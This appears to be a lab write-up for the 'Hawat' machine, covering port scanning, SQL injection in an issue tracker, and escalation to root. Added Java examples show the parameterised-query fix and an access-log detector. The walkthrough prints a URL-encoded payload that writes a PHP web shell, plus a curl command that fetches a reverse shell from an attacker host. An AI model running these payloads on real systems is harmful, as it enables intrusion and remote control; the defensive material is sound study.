HAWAT
1-NMAP
nmap -p- -T4 -vv -sV 192.168.219.147
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
17445/tcp open unknown
30455/tcp open http nginx 1.18.0
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
2-PORT 50080
Doing a directory search with the Gobuster tool we found the directory /cloud on port 50080, where we get a login:

Trying admin/admin we manage to log in, and we see a file that catches our attention called issuetracker.zip:

We download and unzip it, and we see that it is the source code of the website on port 17445:

3-Vuln SQL
Doing some research we found a file called IssueController.java that contains a SQL injection vulnerability:

If we go to the page we will be redirected to the login page, so after logging in we will see the following:

This means that the HTTP method we are using is not the correct one, so we capture the request with Burp Suite and change it to POST:

As we can see we get a 302 (redirect) response; this is because to perform the SQL injection we have to add the priority parameter, and the page then takes 5 seconds to reload:

Now we can create a web shell; the only thing we need to know is the web root path on the server, which we can obtain because on port 30455 there is a phpinfo.php file that we found with Gobuster:

Now that we know which one it is, we just need to create the web shell:
Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+
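The injection above works because the priority value is concatenated into the query text. The following is an added example, not the issuetracker source code: the table and column names (issues, title, priority), the method names and the JDBC wiring are assumptions, since the page only names IssueController.java and the priority parameter. It shows the vulnerable string-building pattern next to the PreparedStatement form that closes the hole, plus a startup check for the MySQL setting the INTO OUTFILE write depends on.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

// Added example; schema, method names and the SHOW VARIABLES check are assumptions,
// not code taken from the issuetracker application.
public class IssueSearch {

    // Vulnerable pattern: the user-controlled priority value is spliced into the SQL text,
    // so a value that closes the quote and appends UNION SELECT ... INTO OUTFILE becomes
    // part of the statement. On MySQL that file write only succeeds when the DB account
    // holds the FILE privilege and secure_file_priv allows the target directory.
    public static List<String> findByPriorityVulnerable(Connection conn, String priority) throws SQLException {
        String sql = "SELECT title FROM issues WHERE priority = '" + priority + "'";
        List<String> titles = new ArrayList<>();
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            while (rs.next()) {
                titles.add(rs.getString("title"));
            }
        }
        return titles;
    }

    // Hardened version: a PreparedStatement sends the query text and the value separately,
    // so quotes and SQL keywords inside priority are treated as data, never as syntax.
    public static List<String> findByPrioritySafe(Connection conn, String priority) throws SQLException {
        String sql = "SELECT title FROM issues WHERE priority = ?";
        List<String> titles = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, priority);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    titles.add(rs.getString("title"));
                }
            }
        }
        return titles;
    }

    // Defence in depth: the chain on this box also needs the database to write into the
    // web root. Reading secure_file_priv at startup surfaces that misconfiguration early
    // (an empty string means "any directory", NULL means file export is disabled).
    public static String secureFilePriv(Connection conn) throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery("SHOW VARIABLES LIKE 'secure_file_priv'")) {
            return rs.next() ? rs.getString("Value") : null;
        }
    }
}
```

Fixing the query alone removes the injection; dropping the FILE privilege from the application's database account and setting secure_file_priv to a directory outside the web root removes the file-write primitive even if another injection is found later.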

4-Web Shell
We can now execute commands:

The next step is to obtain a reverse shell; we will use the one at the path

curl 'http://192.168.219.147:30455/cmd.php?cmd=wget%20http://192.168.45.237:443/php-reverse-shell.php%20-O%20/srv/http/reverse2.php'
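From the defender's side, both steps of this section leave traces in the web-server access log: the file write through SQL and the later requests to cmd.php with a cmd query parameter. The following is an added example, not part of the walkthrough; the log lines are constructed samples in the nginx/Apache combined format, and the host, paths and timestamps are made up.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Added example: flags access-log lines whose decoded request line contains the
// artefacts of this chain. Sample data below is constructed, not captured from the box.
public class WebShellLogCheck {

    // Decoded request contains "INTO OUTFILE" (file write through SQL injection) ...
    private static final Pattern OUTFILE = Pattern.compile("(?i)into\\s+outfile");
    // ... or a .php resource taking a "cmd" query parameter (command web shell pattern).
    private static final Pattern CMD_SHELL = Pattern.compile("(?i)\\.php\\?(?:.*&)?cmd=");

    // Percent-decode the request line so encoded payloads (%27, +, %20) match the patterns.
    static String decode(String s) {
        try {
            return URLDecoder.decode(s, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return s; // malformed escape: inspect the raw line instead of dropping it
        }
    }

    public static List<String> suspiciousLines(List<String> logLines) {
        List<String> hits = new ArrayList<>();
        for (String line : logLines) {
            // In combined format the request line sits between the first pair of double quotes.
            int start = line.indexOf('"');
            int end = start < 0 ? -1 : line.indexOf('"', start + 1);
            if (start < 0 || end < 0) {
                continue;
            }
            String request = decode(line.substring(start + 1, end));
            if (OUTFILE.matcher(request).find() || CMD_SHELL.matcher(request).find()) {
                hits.add(line);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample: one benign request, one injection attempt, one web shell call.
        List<String> sample = List.of(
            "10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] \"GET /issues HTTP/1.1\" 200 512 \"-\" \"curl/7.68.0\"",
            "10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] \"POST /issue/search?priority=Normal%27+UNION+SELECT+1+INTO+OUTFILE+%27/srv/http/x.php%27 HTTP/1.1\" 302 0 \"-\" \"Mozilla/5.0\"",
            "10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] \"GET /cmd.php?cmd=id HTTP/1.1\" 200 40 \"-\" \"curl/7.68.0\"");
        suspiciousLines(sample).forEach(System.out::println);
    }
}
```

One caveat: the walkthrough sends priority in a POST request, and POST bodies are not written to a standard access log, so the INTO OUTFILE pattern only fires when the payload travels in the query string (as in the constructed second line) or when the application or a WAF logs request bodies. The cmd.php?cmd= pattern, on the other hand, is visible in every ordinary access log, and a new .php file appearing in the web root with the database user as owner is a second signal worth alerting on.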
5-Root
After this we only have to make a request to the URL and listen on port 443:
